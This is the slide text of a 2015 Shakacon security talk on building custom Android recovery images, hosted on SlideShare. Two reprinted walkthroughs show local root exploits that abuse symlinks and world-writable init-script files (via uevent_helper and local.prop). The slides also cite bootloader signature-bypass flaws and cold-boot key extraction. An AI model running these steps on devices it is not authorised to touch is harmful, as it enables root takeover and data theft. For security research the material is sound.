SlideShare a Scribd company logo

android recovery guide

Shakacon
Shakacon

Android bootable recovery mode is a self-contained alternative boot mode that loads a tiny Linux environment onto a mobile device. While most stock devices are shipped with recoveries that fairly limited in nature, their use can be greatly extended with a little bit of effort. In this presentation, I will show you how to build your own custom recovery for your Android device. This can be used towards a number of interesting security related goals such as: penetration testing, forensics, data acquisition, bypassing security controls, modifying software, Android development and in some cases provides a direct exploitation route into a device. Using a variety of commonly available tools, attendees will learn how to deconstruct and inspect a number of different boot and recovery software implementations and rapidly begin compiling their own custom tools. The intent is for an attendee to understand the scope and capabilities of Android bootable firmware and learn how to rapidly develop their own custom software for a variety of different purposes. Additionally, it teaches attendees how to look for flaws in bootable firmware which help undermine the security of Android devices. Security research, vulnerability testing, data acquisition and modification, bypassing security controls and platform testing are all intended goals and uses of a custom Android recovery firmware. By the end of the talk, an attendee should have acquired enough knowledge to start making useful tools for security's many needs.

Mobile
1 of 58
Download to read offline
android recovery How To Make Android’s Bootable Recovery Work For You Drew Suarez SHAKACON 2015
android recovery Nice to meet you, I’m Drew. • Security Consultant for Matasano/NCC Group • Focus in mobile security/research • Built Android firmware for dozens of devices • CyanogenMod Project / Wiki • “Cool guy” Internet handle: utkanos
android recovery What’s this all about then? • Why do I need this? • Bootable recovery • Device mapping • Firmware inspection • Flashing your images
android recovery What is Android recovery? • Stock recovery mode: minimal mode on Android devices that boots a Linux environment with tools to install/recover/ repair Android used primarily to install signed OTA updates and reset userdata/cache ADB (Android Debug Bridge) access (sometimes) very limited in scope/usefulness
android recovery What is Android recovery? • Custom recoveries: provide root access / useful binaries allow for easy backup of essential firmware scriptable installation of custom Android firmware
android recovery Why is this significant? • Custom recoveries provide a means to investigate, modify and test new firmware • Full control over device In many cases….
android recovery Why do I need this? • Penetration testing • Forensics or data acquisition • Bypassing security controls • Useful for Android testing/development
android recovery Got it… so how do I make one? • Map the device topology out in full • Get the kernel source (or prebuilt*) • Build Android device configuration
android recovery Bootable Recovery
android recovery
android recovery A Unique Snowflake…
android recovery Recovery: Parts and Structure • Typical Android boot image Android boot header Kernel (compiled zImage) Initial Ramdisk • Initramfs style image Kernel (contains initramfs ramdisk) Recovery binary/tools compiled directly into kernel
android recovery Recovery: Parts and Structure • Combined boot/recovery image Boot image and recovery image share a ramdisk Share one partition
android recovery Recovery: Initrd Images ** +-----------------+ ** | boot header | 1 page ** +-----------------+ ** | kernel | n pages ** +-----------------+ ** | ramdisk | m pages ** +-----------------+ ** | 2nd stage | o pages ** +-----------------+ Boot Header: 1) Magic (8B) 2) kernel size (4B) 3) kernel addr (4B) 4) ramdisk size (4B) 5) ramdisk addr (4B) 6) 2ndary size (4B) 7) 2ndary addr (4B) 8) tags addr (4B) 9) page size (4B) 10) * 11) * 12) product name (16B) 13) kernel cmdline (512B) 14) id (8B) * 10 and 11 of Boot Header used for DTB (device tree blob), unused otherwise
android recovery Recovery: Parts and Structure • Initial ramdisk/ramfs Loads a temporary root filesystem into memory Files needed specifically for recovery mode operation init binary/scripts, binaries, images and firmware Can be rebuilt or modified to include more tools and features and extended functionality
android recovery Recovery: Parts and Structure • recovery.fstab (<=Android 4.2.2): Maps block devices and their filesystems to mount points Resides typically in etc/ or res/ in ramdisk • fstab.(platform) (>=Android 4.3): Ex: fstab.qcom, fstab.msm8974 Slightly different mapping order
android recovery Device Mapping
android recovery Device Mapping • Stock firmware (boot or recovery) variety of sites/places to source OEM firmware to source pull from a rooted device (via dd) • Uses troubleshooting / recon device topology
android recovery Device Mapping • Kernel source A must-have for initramfs style recoveries Useful for making smaller kernels for devices with limited recovery space Can be modified for your specific needs
android recovery Device Mapping • /system/build.prop Contains parameters used for setting various different options in Android We want the device specific board codename information • /proc/emmc or /proc/mtd, /proc/partitions • /proc/config.gz and ikconfig
android recovery Ok, where do I find all this stuff ?! Lets take apart some firmware.
android recovery Standard Android boot image utkanos@leviathan /amnesiac/android/recovery/dlx $ od -c recovery.img |more 0000000 A N D R O I D ! 310 t S 0 0 200 ` 200 0000020 341 P ' 0 0 200 240 201 0 0 0 0 0 0 P 201 0000040 0 001 ` 200 0 b 0 0 0 0 0 0 0 0 0 0 0000060 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0000100 c o n s o l e = t t y H S L 0 , 0000120 1 1 5 2 0 0 , n 8 a n d r o i 0000140 d b o o t . h a r d w a r e = d 0000160 l x u s e r _ d e b u g = 3 1 0000200 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
android recovery Firmware Exploration • unpackbootimg/mkboot [1] $> unpackbootimg -i firmware.img -o . $> zcat ramdisk.gz | cpio -id —- $> mkboot firmware.img outdir • unpack-initramfs.sh [2] • binwalk
android recovery mkboot utkanos@leviathan ~/mkbootimg_tools $ ./mkboot /amnesiac/android/hlte/ recovery_hltetmo.img hltetmo_outdir Unpack & decompress /amnesiac/android/hlte/recovery_hltetmo.img to hltetmo_outdir kernel : zImage ramdisk : ramdisk page size : 2048 kernel size : 8281496 ramdisk size : 2987655 dtb size : 1316864 base : 0x00000000 kernel offset : 0x00008000 ramdisk offset : 0x02900000 second_offset : 0x00f00000 tags offset : 0x02700000 dtb img : dt.img cmd line : console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x3F ramdisk is gzip format. Unpack completed.
android recovery Firmware Exploration • Our goal is to get the ramdisk and a working prebuilt kernel (zImage) • The ramdisk contains init scripts, custom scripts and binaries we want • Very useful for finding flaws to exploit devices
android recovery Why are init scripts so important? • Great source for bugs symlink attacks overly permissive permissions debug functionality • Contain services and their parameters helpful for making recovery run properly
android recovery symlink/permissions tomfoolery Reprinted with kind permission from jcase. [3] # DRMv1 rights storage symlink /data/local /data/drm mkdir /data/local/rights 0777 shell shell chown shell shell /data/drm write /data/drm/rights/mid.txt 0000000000000000 chmod 0777 /data/drm/rights/mid.txt
android recovery Reprinted with kind permission from jcase. [3] Retina:recovery jcase$ adb push root.sh /data/local/rights/ Retina:recovery jcase$ adb shell $ cd /data/local/rights $ ls -l -rw-rw-rw- shell shell 153 2014-07-23 20:15 root.sh -rwxrwxrwx root root 16 2014-07-23 20:13 mid.txt $ chmod 755 root.sh $ mv mid.txt mid.txt-backup $ ln -s /sys/kernel/uevent_helper mid.txt $ ls -l /sys/kernel/uevent_helper -rw-r--r-- root root 4096 2014-07-23 20:14 uevent_helper $ exit Retina:recovery jcase$ adb reboot Retina:recovery jcase$ adb shell $ ls -l /sys/kernel/uevent_helper -rwxrwxrwx root root 4096 2014-07-23 20:14 uevent_helper $ echo "/data/local/rights/root.sh" > /sys/kernel/uevent_helper $ cat /sys/kernel/uevent_helper /data/local/rights/root.sh $ su #
android recovery symlink/permissions tomfoolery # cd /data/data # ls -l ... (snip) ... drwxr-xr-x app_0 app_0 2014-07-27 12:14 com.htc drwxrwxrwx root root 2014-07-27 12:13 recovery # ls -l -a -R recovery recovery: -rw-rw-rw- root root 383 2014-07-27 12:13 log Reprinted with kind permission from jcase. [3]
android recovery Retina:recovery jcase$ adb shell $ cd /data/data/recovery $ ls -l -rw-rw-rw- root root 383 2014-07-27 12:13 log $ rm log $ ln -s /data/local.prop log $ exit Retina:recovery jcase$ adb reboot recovery Retina:recovery jcase$ adb shell $ ls -l /data/local.prop -rw-rw-rw- root root 3114 2014-07-27 17:11 local.prop $ echo 'ro.kernel.qemu=1' > /data/local.prop $ exit Retina:recovery jcase$ adb reboot Retina:recovery jcase$ adb shell # id uid=0(root) gid=0(root) Reprinted with kind permission from jcase. [3]
android recovery What else in the ramdisk is interesting? • watchdog daemons • necessary kernel objects • stand alone binaries • special commands
android recovery What if I can't figure something out? • If lacking firmware, attempt to look at the device by hand using adb shell • Use output of mount to identify key partitions • Look at sizes in /proc/partitions and make educated guesses for firmware locations
android recovery Building a Recovery
android recovery Build a device config • Android build system Based on “meal ordering” concept Each device is a unique “combo meal” Combos can inherit from one another We need to build a new combo!
android recovery Build a device config • CyanogenMod (or other) Android source [4] • Linux or OSX • All the info gathered earlier
android recovery Build a device config • Utilize the mkvendor.sh script in the Android source mkvendor takes 3 parameters and builds a skeleton bare bones device config ex: $> mkvendor.sh samsung hltetmo recovery_hltetmo.img
android recovery Build a device config • mkvendor output is almost always incomplete/wrong, fix it! BoardConfig.mk recovery.fstab/fstab.platform device_(codename).mk
android recovery BoardConfig.mk • Contains essential information about your device’s board, CPU, various hardware and device specific oddities • Requires the most modification and is continuously evolving the further in the process you get • For the scope of this talk, only the bare necessities to build a recovery are covered
android recovery BoardConfig.mk • BOARD_FORCE_RAMDISK_ADDRESS • BOARD_MKBOOT_ARGS use these to force a ramdisk offset especially important on large partitions former deprecated after Android 4.1
android recovery device_(codename).mk • Contains instructions about what packages to build and where to copy specific files or properties during your build • Use this file to insert necessary or additional files into the ramdisk during compile time • Essential for including OEM specific oddities, specific binaries or scripts required for recovery operation
android recovery Build it! • Use lunch to load in your new device combo $> source build/envsetup.sh $> lunch YOURDEVICE-eng $> make recoveryimage
android recovery Flash it! • Once you’re ready to boot the recovery, use one of the following common methods based on your specific use case dd (requires root, see init portion of talk ) flash_image (mtd typically) ODIN/Heimdall (Samsung) fastboot (various OEMs) laf
android recovery Download Mode (Samsung)
android recovery Download Mode (Samsung) • Download Mode is a Samsung specific boot loader interface shipped on all of their Android devices. It requires specific naming on images you wish to flash! • Internally, Samsung uses a tool called ODIN to interact with the device and flash firmware This is a Windows only, closed source application :(
android recovery ODIN
android recovery Download Mode • ODIN requires ustar formatted tar archives containing the firmware desired. Here’s how to make one: $> tar -H ustar -c recovery.img > recovery.tar $> md5sum -t recovery.tar >> recovery.tar $> mv recovery.tar recovery.tar.md5
android recovery Download Mode (Samsung) • Heimdall is an open source, cross-platform tool created from reversing ODIN • Capable of writing raw images • More flexible and useful than ODIN
android recovery Download Mode (Samsung) • Overly permissive! Most devices allow direct write access aside from a handful of US carrier protected models • Newer protections exist but are inconsistently applied
android recovery fastboot mode • Found on Nexus, HTC, Sony and many other OEMs. • Great for testing an image without having to write it to local storage (fastboot boot) • Unlocking the bootloader to use fastboot most often but not always erases userdata partition!
android recovery unless… • issues with lk (little kernel) boot loader used on many devices: “Fastboot boot command bypasses signature verification (CVE-2014-4325)” [5] “Incomplete signature parsing during boot image authentication leads to signature forgery (CVE-2014-0973)” [6] “Improper partitions bounds checking when flashing sparse images (CVE-2015-0567)” [7] • Download mode • laf • Numerous other exploits…
android recovery LG’s laf/download • Bootable partition named la found on many LG devices (including the Nexus 5(!)) • Communication via Send_Command binary (Windows) ported to other platforms via python • Root shell (backdoor)
android recovery LG’s laf / download
android recovery FROST / forensics [9] • Forensic Recovery Of Scrambled Telephones is a custom recovery (based on ClockworkMod) for retrieval of encryption keys, PIN codes and content stored in RAM “Cold boot” attack (uses actual freezer to slow down the degradation of RAM content) Rate of decay drops enough to be useful around 10 °C • Uses aeskeyfind ‘live’ or via memory dump on PC to search for AES keys
android recovery New Protections… • init contexts • Protections like Knox/Secure Boot on more and more models • TrustZone wrapping of device key • Increased SELinux presence and system protections like blocking view into /dev
android recovery Getting started • Github is your friend! • Many sites host stock firmware for Android devices samfirmware.com xda-developers.com forums
android recovery Getting started • Setting up your build environment: CyanogenMod wiki has a step by step walkthrough and additional resources for development and hacking • Review links in the references section • Stay up on Android security via droidsec
android recovery References [1] https://github.com/CyanogenMod/android_system_core/tree/cm-11.0/mkbootimg [2] https://github.com/xiaolu/mkbootimg_tools [3] From material Copyright 2014 Jon Sawyer - Applied Cybersecurity LLC used with kind permission [4] https://github.com/CyanogenMod/ , https://github.com/CyanogenMod/android_bootable_recovery , https://github.com/TeamWin/Team-Win-Recovery-Project [5] https://www.codeaurora.org/projects/security-advisories/fastboot-boot-command-bypasses- signature-verification-cve-2014-4325 [6] https://www.codeaurora.org/projects/security-advisories/incomplete-signature-parsing-during-boot- image-authentication-leads-to-signature-forgery-cve-2014-0973 [7] https://www.codeaurora.org/projects/security-advisories/lk-improper-partition-bounds-checking- when-flashing-sparse-images-cve [8] Courtesy of Fuzion24 (@Fuzion24) [9] https://www1.informatik.uni-erlangen.de/frost
android recovery Thank you! Questions? Drew Suarez // matasano security @utkan0s on twitter https://github.com/utkanos utkanos on freenode (#droidsec) utkanos at gmail dot com

Recommended

Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Shakacon
 
Android booting sequece and setup and debugging
Android booting sequece and setup and debuggingAndroid booting sequece and setup and debugging
Android booting sequece and setup and debuggingUtkarsh Mankad
 
Booting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesBooting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesChris Simmonds
 
Learning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessLearning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessNanik Tolaram
 
Android Booting Sequence
Android Booting SequenceAndroid Booting Sequence
Android Booting SequenceJayanta Ghoshal
 
Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Sarath C
 
Android Custom Kernel/ROM design
Android Custom Kernel/ROM designAndroid Custom Kernel/ROM design
Android Custom Kernel/ROM designMuhammad Najmi Ahmad Zabidi
 
Android Boot Time Optimization
Android Boot Time OptimizationAndroid Boot Time Optimization
Android Boot Time OptimizationKan-Ru Chen
 

Recommended

Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Richard wartell malware is hard. let's go shopping!!
Richard wartell malware is hard. let's go shopping!!Shakacon
 
Android booting sequece and setup and debugging
Android booting sequece and setup and debuggingAndroid booting sequece and setup and debugging
Android booting sequece and setup and debuggingUtkarsh Mankad
 
Booting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesBooting Android: bootloaders, fastboot and boot images
Booting Android: bootloaders, fastboot and boot imagesChris Simmonds
 
Learning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessLearning AOSP - Android Booting Process
Learning AOSP - Android Booting ProcessNanik Tolaram
 
Android Booting Sequence
Android Booting SequenceAndroid Booting Sequence
Android Booting SequenceJayanta Ghoshal
 
Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Tip: How to enable wireless debugging with Android?
Tip: How to enable wireless debugging with Android?Sarath C
 
Android Custom Kernel/ROM design
Android Custom Kernel/ROM designAndroid Custom Kernel/ROM design
Android Custom Kernel/ROM designMuhammad Najmi Ahmad Zabidi
 
Android Boot Time Optimization
Android Boot Time OptimizationAndroid Boot Time Optimization
Android Boot Time OptimizationKan-Ru Chen
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel HackingDeveler S.r.l.
 
Hacking Android OS
Hacking Android OSHacking Android OS
Hacking Android OSJimmy Software
 
How To Build Android for ARM Chip boards
How To Build Android for ARM Chip boardsHow To Build Android for ARM Chip boards
How To Build Android for ARM Chip boardsIndustrial Technology Research Institute (ITRI)(工業技術研究院, 工研院)
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debuggingAshish Agrawal
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Reconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemReconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemAlex Matrosov
 
Init of Android
Init of AndroidInit of Android
Init of AndroidTetsuyuki Kobayashi
 
Android Booting Scenarios
Android Booting ScenariosAndroid Booting Scenarios
Android Booting ScenariosAmr Ali (ISTQB CTAL Full, CSM, ITIL Foundation)
 
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar44CON
 
Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Francesco Prior
 
Learning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverLearning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverNanik Tolaram
 
Android OTA updates
Android OTA updatesAndroid OTA updates
Android OTA updatesGary Bisson
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflowAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Android Internals
Android InternalsAndroid Internals
Android InternalsOpersys inc.
 
Kernel_Crash_Dump_Analysis
Kernel_Crash_Dump_AnalysisKernel_Crash_Dump_Analysis
Kernel_Crash_Dump_AnalysisBuland Singh
 
Study on Android Emulator
Study on Android EmulatorStudy on Android Emulator
Study on Android EmulatorSamael Wang
 
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Ron Munitz
 
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...Symantec
 

More Related Content

What's hot

Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel HackingDeveler S.r.l.
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debuggingAshish Agrawal
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Reconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemReconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemAlex Matrosov
 
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar44CON
 
Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Francesco Prior
 
Learning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverLearning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverNanik Tolaram
 
Android OTA updates
Android OTA updatesAndroid OTA updates
Android OTA updatesGary Bisson
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationMichael Boman
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON
 
Kernel_Crash_Dump_Analysis
Kernel_Crash_Dump_AnalysisKernel_Crash_Dump_Analysis
Kernel_Crash_Dump_AnalysisBuland Singh
 
Study on Android Emulator
Study on Android EmulatorStudy on Android Emulator
Study on Android EmulatorSamael Wang
 

What's hot (20)

Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel Hacking
 
Hacking Android OS
Hacking Android OSHacking Android OS
Hacking Android OS
 
How To Build Android for ARM Chip boards
How To Build Android for ARM Chip boardsHow To Build Android for ARM Chip boards
How To Build Android for ARM Chip boards
 
Android crash debugging
Android crash debuggingAndroid crash debugging
Android crash debugging
 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Reconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis ProblemReconstructing Gapz: Position-Independent Code Analysis Problem
Reconstructing Gapz: Position-Independent Code Analysis Problem
 
Init of Android
Init of AndroidInit of Android
Init of Android
 
Android Booting Scenarios
Android Booting ScenariosAndroid Booting Scenarios
Android Booting Scenarios
 
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar
 
Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"Astricon 2013: "Asterisk and Database"
Astricon 2013: "Asterisk and Database"
 
Learning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverLearning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device Driver
 
Android OTA updates
Android OTA updatesAndroid OTA updates
Android OTA updates
 
Indicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradicationIndicators of compromise: From malware analysis to eradication
Indicators of compromise: From malware analysis to eradication
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?44CON London 2015 - Is there an EFI monster inside your apple?
44CON London 2015 - Is there an EFI monster inside your apple?
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
Android Internals
Android InternalsAndroid Internals
Android Internals
 
Kernel_Crash_Dump_Analysis
Kernel_Crash_Dump_AnalysisKernel_Crash_Dump_Analysis
Kernel_Crash_Dump_Analysis
 
Study on Android Emulator
Study on Android EmulatorStudy on Android Emulator
Study on Android Emulator
 

Similar to android recovery guide

Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Ron Munitz
 
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...Symantec
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptxssuserb4d806
 
Embedded Android
Embedded AndroidEmbedded Android
Embedded Android晓东 杜
 
Solaris Kernel Debugging V1.0
Solaris Kernel Debugging V1.0Solaris Kernel Debugging V1.0
Solaris Kernel Debugging V1.0Jarod Wang
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Build and Run Android N Source Ccode on NXP SABRESD platform
Build and Run Android N Source Ccode on NXP SABRESD platformBuild and Run Android N Source Ccode on NXP SABRESD platform
Build and Run Android N Source Ccode on NXP SABRESD platformDaniel Chiu
 
Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...
Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...
Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...FFRI, Inc.
 
AHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATION
AHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATIONAHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATION
AHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATIONZahid02
 
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsAndy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsNCC Group
 
Real-World Docker: 10 Things We've Learned
Real-World Docker: 10 Things We've Learned Real-World Docker: 10 Things We've Learned
Real-World Docker: 10 Things We've Learned RightScale
 
Working with the AOSP - Linaro Connect Asia 2013
Working with the AOSP - Linaro Connect Asia 2013Working with the AOSP - Linaro Connect Asia 2013
Working with the AOSP - Linaro Connect Asia 2013Opersys inc.
 
Android porting for dummies @droidconin 2011
Android porting for dummies @droidconin 2011Android porting for dummies @droidconin 2011
Android porting for dummies @droidconin 2011pundiramit
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 

Similar to android recovery guide (20)

Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
Bringing up Android on your favorite X86 Workstation or VM (AnDevCon Boston, ...
 
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
A Step-By-Step Disaster Recovery Blueprint & Best Practices for Your NetBacku...
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
 
Discover System Facilities inside Your Android Phone
Discover System Facilities inside Your Android Phone Discover System Facilities inside Your Android Phone
Discover System Facilities inside Your Android Phone
 
Embedded Android
Embedded AndroidEmbedded Android
Embedded Android
 
Solaris Kernel Debugging V1.0
Solaris Kernel Debugging V1.0Solaris Kernel Debugging V1.0
Solaris Kernel Debugging V1.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Build and Run Android N Source Ccode on NXP SABRESD platform
Build and Run Android N Source Ccode on NXP SABRESD platformBuild and Run Android N Source Ccode on NXP SABRESD platform
Build and Run Android N Source Ccode on NXP SABRESD platform
 
Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...
Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...
Android Things Security Research in Developer Preview 2 (FFRI Monthly Researc...
 
Buildsystem.mk
Buildsystem.mkBuildsystem.mk
Buildsystem.mk
 
Buildsystem.mk - DroidCon Paris 2014
Buildsystem.mk - DroidCon Paris 2014Buildsystem.mk - DroidCon Paris 2014
Buildsystem.mk - DroidCon Paris 2014
 
AHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATION
AHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATIONAHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATION
AHMED JASSAT SOUTH ARICAN ORACLE USER GROUP PRESENTATION
 
005 skyeye
005 skyeye005 skyeye
005 skyeye
 
Geode on Docker
Geode on DockerGeode on Docker
Geode on Docker
 
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprintsAndy Davis' Black Hat USA Presentation Revealing embedded fingerprints
Andy Davis' Black Hat USA Presentation Revealing embedded fingerprints
 
Real-World Docker: 10 Things We've Learned
Real-World Docker: 10 Things We've Learned Real-World Docker: 10 Things We've Learned
Real-World Docker: 10 Things We've Learned
 
Working with the AOSP - Linaro Connect Asia 2013
Working with the AOSP - Linaro Connect Asia 2013Working with the AOSP - Linaro Connect Asia 2013
Working with the AOSP - Linaro Connect Asia 2013
 
